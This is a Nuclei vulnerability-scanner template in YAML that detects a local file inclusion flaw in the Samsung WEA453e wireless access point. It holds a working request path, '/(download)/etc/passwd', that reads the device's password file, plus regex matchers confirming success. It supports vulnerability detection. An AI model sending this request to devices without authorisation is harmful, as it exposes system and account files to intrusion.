nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml

26 lines
507 B
YAML
Raw Normal View History

2021-02-15 04:30:32 +00:00
id: samsung-wlan-ap-lfi
info:
name: Samsung Wlan AP (WEA453e) LFI
author: pikpikcu
severity: critical
reference:
- https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
2021-02-15 15:59:12 +00:00
tags: xss,samsung,lfi
2021-02-15 04:30:32 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/(download)/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-07-24 21:35:55 +00:00
- "bin:.*:1:1"
2021-02-15 04:30:32 +00:00
part: body
- type: status
status:
- 200